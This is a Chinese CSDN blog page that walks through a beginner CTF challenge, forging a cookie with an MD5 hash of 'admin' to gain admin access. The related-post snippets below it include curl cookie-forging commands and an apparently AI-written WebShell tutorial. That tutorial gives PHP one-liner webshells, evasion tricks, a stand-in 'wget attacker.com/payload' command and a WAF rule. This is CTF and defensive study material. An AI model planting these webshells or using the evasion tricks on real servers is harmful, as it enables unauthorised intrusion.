利用cookie获取admin权限 CTF基础题

最新推荐文章于 2025-02-28 15:27:59 发布
最新推荐文章于 2025-02-28 15:27:59 发布
阅读量1.4w 收藏 21
点赞数 6
分类专栏: 笔记 文章标签: 安全 cookie
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37410729/article/details/109248378
版权

一道很基础的ctf cookie题,如果对cookie不太了解的话,可以去这里看看
https://blog.csdn.net/playboyanta123/article/details/79464684

话不多说,直接上图。
在这里插入图片描述
源代码是一些没用的东西。

根据题意,我们直接用burp拦截,改cookie
在这里插入图片描述
裸抓包后提示权限不足,我们直接改cookie。
比较cookie中的u和r 会发现都是351e766803开头,所以我们把后面的东西拿去解密(MD5)一下。
在这里插入图片描述
发现u是username,r是limited。
所以说我们要改后面的来获取admin权限。
就是将u和r都改为351e766803+md5(admin),即351e76680321232f297a57a5a743894a0e4a801fc3。
在这里插入图片描述
搞定!flag它出现了!

【网络安全 | CTF】攻防世界 cookie详析
等风来
05-20 6859
使用Burp Suite抓包可以更全面地查看HTTP响应及其它与网络通信相关的信息,具体操作本文不再赘述。目描述:X老师告诉小宁他在cookie里放了些东西,小宁疑惑地想:这是夹心饼干的意思吗?HTTP响应通常可以在浏览器的开发者工具中找到。根据提示,获取页面Cookie中的数据即可。如图,flag存在于。
BugkuCTF-WEBcookie欺骗
am_03的博客
08-29 1158
知识点 isset: 检测变量是否设置,并且不是 NULL $_GET:收集来自 method=“get” 的表单里的值 intval() 函数用于获取变量的整数值。 in_array() 函数搜索数组里是否存在指定的值。 举例: <?php $am = array("Bill", "Steve", "trump", "David"); if (in_array("trump", $am)) { echo "匹配已找到"; } else { echo "匹配未找到"; } ?&
CTF之web——cookie
weixin_61167540的博客
11-23 2034
在cmd中输入:curl -i http://challenge-5460ffbe35aa75a0.sandbox.ctfhub.com:10800/ --cookie "admin=1"这里之所以设置cookieadmin=1,是因为上图中看到网页的请求头里admin=0,也就是设置的不是admin用户去访问的,改成1就好啦。cookie是存储再客户端上的一小段数据,浏览器(即客户端)通过HTTP协议和服务器端进行cookie交互,通常用来存储一些不敏感信息。
ctfshow——Cookie泄露
MoSiZh的博客
02-28 236
所以,我们可以通过F12打开控制台,找到存储里的Cookie,然后就会发现有个ctfshow%7Bbd64dae1-4ad7-445d-b74f-27cf0ccc0da1%7D。看到%7B开头,知道这是URL编码,所以我们通过URL解码就可以得到flag 了。本较为简单,说的是Cookie泄露。
CTF-web· cookie
2302_80276789的博客
07-21 474
在右上角上会看到url上有cookie的字样,因此可以判断出来这使用了cookie,按下F12,找到储存,会看到一个cookie栏目。会发现hint值有一个fl4g.txt很像flag,或者如果我们没有关闭burp,那么我们就可以看到。这其实就是flag的变形,那么,我们就可以对他进行访问。打开目之后会发现如下界面。然后就会得到flag。
[CTF攻防世界] WEB区 关于Cookie
weixin_43586169的博客
04-14 2024
描述关于Cookie
CTF练习[WEB]-cookies
weixin_45246254的博客
02-10 2878
https://ctf.bugku.com/challenges/detail/id/87.html 拿到目如下,提示:Cookies欺骗 访问跳转到以下地址 http://114.67.175.224:15773/index.php?line=&filename=a2V5cy50eHQ= filename看起来就是base64,拿去解码 扫目录没有发现其他可疑文件 推测攻破点就在这个filename这里了,另外还有个line变量 先把line拿去遍历,没有发现什么 已知的还有一个文件就是
CTF基础
Mars_boom的博客
10-21 7125
web基础 了解web:web通过HTTP协议进行通信, 1、目描述:X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。 目场景: http://220.249.52.133:48687/ 答案:按F12/fn+F12打开源代码,查看到flag 2、目描述:X老师上课讲了Robots协议,小宁同学却上课打了瞌睡,赶紧来教教小宁Robots协议是什么吧。 目场景: http://220.249.52.133:36226 答案:关于robots协议,即爬虫协议,网站可以防止爬虫
CTFWeb 基础】总结笔记以及实例(1)
weixin_45871855的博客
03-19 4885
自己总结的基础笔记,仅供查考 1.查看源代码 例:http://lab1.xseclab.com/base1_4a4d993ed7bd7d467b27af52d2aaa800/index.php (F12或Ctrl+U) 2.查看HTTP请求头或响应头 使用抓包工具(burp)查看HTTP请求,在 Repeater 中查看响应头 例:http://lab1.xseclab.com/base7_eb...
网络安全CTF流量分析-基础1-Flask的Session流量解密
m0_51198141的博客
11-27 1443
1.admin用户的密码是多少2.app.config['SECRET_KEY']的值3.flask网站由哪个用户启动4.攻击者写入的内存马的路由名叫什么这道整体来说包比较小,但是流量的内容全都是加密的,如果对解密不熟练解决起来就会有困难,其中的Flask的Session的解密还是比较有意思。写的不是很好,有问欢迎师傅们留言指出基础的篇章开始。
WEB CTF入门解析
攻防人生3722的博客
07-30 8162
WEB CTF入门学习 入门1 view_source X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。 答案:cyberpeace{ffbb0c3dcdb78ed0674f699dc967ce67} 解析:打开网址http://220.249.52.133:31520/,F12调试模式,查看源码,即可发现flag: cyberpeace{ffbb0c3dcdb78ed0674f699dc967ce67} 入门2 get_post 目描述:X老师告诉小宁同学HTTP
CTF | CTF比赛解分享
hackzkaq的博客
10-09 8763
前言:由于此次比赛的目较多,所以这是这个比赛的第一篇wp,共20,先记录一下,防止忘记。里面有些目是新手较为简单,但也有许多有意思的目,真的是做的过程痛不欲生,做完才感觉到酣畅淋漓,废话不多说,开写。接下来就可以定位了。1.这次显示文件是个jpg格式的图片,但是打不开,16进制编辑器打开,看到文件头出现了IHDR头,就可以想到其实是个png格式的图片,再看到文件尾,更加证实了是个png文件。4.第三张照片是最头疼的,全都是高楼,能够看到的只有广西农信,时代丽都,搜索相关位置,找到了大概区域。
CTF-Web20(涉及简单的cookie与session)
→_→
09-21 5731
20.Guess Next Session 分析: 观察代码,在代码中并没有什么函数,关键就在于:password = $_session['password']。 问到了这一步,让我们把这放下,先来分析一下PHP中的Session和CookieCookie与 Session,一般都会认为这是两个独立完全不同的东西,Session采用的是在服务器端保持状态的方案,而Cookie采用的是在客户端保持状态的方案。在PHP配置中的默认情况下,Session是用Session ID来确.
CG-CTF-Web-COOKIE
1stPeak's Blog
06-28 2725
COOKIE 1.目 2.访问目地址,页面无显示 源代码无显示: 3.那就抓包!! 看到上图中的Cookie,让我又联想到Cookie与Tip:0==not 一开始我还真是使用Login=not来发包,结果得不到flag,原来它这个Tip是告诉你0是错误的,并不是0=not,并且,这里是==,又让我想到会不会是弱类型比较(最后返回true(表示是1)或者false(表示0))。 ...
BugKuCTF中套路满满的-------Cookie欺骗
qq_42133828的博客
12-19 2435
这一,首先看目,Cookie欺骗,那么什么是Cookie欺骗呢?      看了网上的一些博客后,我想可以总结一句话就是: 你在火狐成功登陆了一个账号,并且把session_id记录下来,转而去其他浏览器登陆此账号,但此时的登陆不需要密码和账号,只需要把Session_id传给服务器,便可成功登陆  好了,话不多说,直接上。。。      首先,界面给出的是一串字符,当我想并没有什么用...
IE Cookie 管理工具 Cookie Admin
weixin_30339457的博客
05-05 132
一个IE Cookie查看工具 点击下载 2009-04-21 beta * 启动时在后台读取Cookie * 关于窗口增加了当前Blog地址 2008-05-05 beta + 查看已有Cookie + 删除Cookie文件 + 强大的搜索功能,支持通配符、正则表达式 + 根据系统语言自动切换界面语言 主窗口截图 搜索 ...
CTFHUB Cookie
孙轶扬
04-09 1754
#目 打开环境,会发现需要admin才能拿到旗子。检查cookie,发现name已经是admin。 #解 使用控制台,curl命令的--cookie参数,传入cookie。 curl challenge-f83536cf678926e2.sandbox.ctfhub.com:10080/ --cookie "admin=1;" 如图,这样就能得到旗子了。 #反思 在得到正确答案之前,我进...
CTF web入门——HTTP头相关的----修改请求头、伪造Cookie目——Bugku Web目详细
热门推荐
日熙的博客
07-25 6万+
目一:Bugku 程序员本地网站 1.打开目显示如下: 目二:Bugku 管理员系统 目三:XCTF xff_referer
CTFHub | Cookie注入
尼泊罗河伯的博客
11-20 2087
根据网页显示内容提示,这关于 Cookie 注入,Cookie 注入和之前的注入手法一致,只不过需要在网页 Cookie 中修改其参数进行注入判断,那么直接打开工具 BurpSuite 对目网站进行抓包。判断发现存在 Cookie 注入,接着判断字段数量,查看数据库位置和版本。使用注入常用流程爆库、爆表、爆数据。最后获得此 flag 。
ctfwebshell
最新发布
03-09
<think>好的,我现在需要处理用户关于CTF竞赛中WebShell的使用教程与检测方法的查询。首先,用户提供的引用内容涉及WebShell的基础知识、免杀方法、CMS漏洞利用、文件上传漏洞以及通过其他方式植入WebShell的途径。我需要综合这些信息,按照用户的要求结构清晰、分步骤解答,并生成相关问。 首先,用户的问分为两部分:使用教程和检测方法。我需要分别处理这两个部分。使用教程应包括WebShell的基本概念、常见类型、使用方法(如蚁剑连接)、免杀技巧以及获取WebShell的途径。检测方法则需要涵盖日志分析、文件监控、行为检测、流量分析、WAF规则和沙箱检测等。 在引用内容中,用户提到了利用公开漏洞获取WebShell(如PHPCMS的例子)、文件上传漏洞植入WebShell,以及通过蚁剑配置连接的方法。这些都需要整合到教程部分。同时,检测方法部分需要结合引用提到的文件上传漏洞利用后的检测,以及流量分析和日志检查。 需要确保回答中使用正确的LaTeX格式,所有行内数学表达式用$...$,独立公式用$$...$$,但当前内容可能涉及较少的数学公式,可能需要检查是否有必要使用。例如,在讲解加密或编码时可能会有Base64的示例,可以用行内代码块而非数学公式。 另外,用户要求生成相关问,需要根据内容提出三个相关问,例如WebShell的隐藏方法、检测工具、免杀技术演进等。 需要确保回答符合系统级指令,特别是正确的中文回答和引用标注。引用[1]、[2]、[3]分别在适当的位置添加,例如在公开漏洞途径、文件上传漏洞和蚁剑连接部分。 现在开始组织内容: 1. WebShell使用教程: - 定义和作用:根据引用[2],WebShell是攻击者留下的后门,用于后续操作。 - 常见类型:一句话木马(如PHP的eval($_POST['cmd'])),引用[3]中的例子。 - 使用方法:蚁剑配置步骤,引用[3]中的步骤。 - 免杀技巧:编码加密、混淆、隐藏路径,引用[1]中的免杀基础。 - 获取途径:公开漏洞(引用[1]的PHPCMS例子)、文件上传(引用[2])、其他方式如数据库插入(引用[2])。 2. 检测方法: - 日志分析:检查异常访问,引用[2]中的文件上传漏洞利用后的日志。 - 文件监控:查找异常文件,如引用[3]中的www目录下的木马。 - 行为检测:执行命令的行为,引用[2]中的webshell后续操作。 - 流量分析:加密流量特征,引用[2]中的webshell通信。 - WAF规则:拦截可疑请求,引用[1]中的修复漏洞建议。 - 沙箱检测:动态分析,引用可能未直接提到,但属于常见方法。 生成的相关问需要围绕使用和检测,例如隐藏方法、工具推荐、免杀技术等。 需要检查是否所有引用都被正确使用,并且标注在相应位置。例如,在提到公开漏洞时添加[^1],文件上传漏洞添加[^2],蚁剑连接添加[^3]。 最后,确保结构清晰,分点回答,代码块正确使用,引用标注自然。</think>### CTF竞赛中WebShell的使用教程与检测方法 #### 一、WebShell基础与使用教程 1. **WebShell定义与作用** WebShell是一种通过Web脚本语言(如PHP、ASP)编写的恶意程序,通常作为攻击者控制服务器的后门。例如PHP一句话木马: ```php <?php @eval($_POST['cmd']); ?> ``` 攻击者可通过此木马执行任意系统命令或上传文件。 2. **常见WebShell类型** - **一句话木马**:如`<?php system($_GET['cmd']); ?>`,常用于快速连接工具(如蚁剑)。 - **加密木马**:通过Base64或异或运算隐藏代码,例如: ```php <?php eval(base64_decode("ZGllKGZpbGVfZ2V0X2NvbnRlbnRzKCdwaHAnKSk7")); ?> ``` - **图片马**:将WebShell嵌入图片的EXIF信息中,绕过基础检测。 3. **WebShell使用方法(以蚁剑为例)** - **步骤1**:将木马上传到目标服务器(如通过文件上传漏洞)。 - **步骤2**:配置蚁剑连接参数,填写木马URL和密码: ```python # 示例:连接配置 URL: http://target.com/shell.php 密码: cmd # 对应$_POST['cmd'] ``` - **步骤3**:通过图形化界面执行命令、浏览文件或提权。 4. **免杀技巧** - **代码混淆**:使用函数动态拼接关键字,如`$a = "ev"."al"; $a($_GET['c']);`。 - **加密通信**:采用AES加密传输内容,避免流量特征被识别[^1]。 - **隐藏路径**:将WebShell文件命名为`index.php.bak`,利用服务器解析漏洞[^1]。 5. **WebShell获取途径** - **公开漏洞利用**:如PHPCMS历史漏洞可直接上传木马。 - **文件上传漏洞**:绕过类型检测(如修改Content-Type为`image/png`)。 - **数据库写入**:通过SQL注入将木马插入表字段,再导出为PHP文件。 --- #### 二、WebShell检测方法 1. **日志分析** 检查Web日志中异常请求,如频繁访问`/admin/shell.php?cmd=whoami`,或POST数据包含`eval`关键字。 2. **文件监控** - **哈希对比**:定期计算系统文件的MD5值,发现未知修改。 - **敏感函数扫描**:使用工具搜索文件中`eval`、`system`、`shell_exec`等危险函数。 3. **行为检测** - **进程监控**:检测异常进程(如`/bin/sh -c "wget http://attacker.com/payload"`)。 - **权限审计**:Web用户(如www-data)突然拥有root权限。 4. **流量分析** 识别加密流量中的固定特征,例如蚁剑默认的UA头`AntSword/v2.1`,或固定心跳包间隔。 5. **WAF规则** 配置正则规则拦截可疑请求,如: ```nginx if ($query_string ~* "(eval\(|base64_decode)") { return 403; } ``` 6. **沙箱动态检测** 上传文件至沙箱环境,观察是否尝试连接外部IP或修改系统关键文件[^2]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值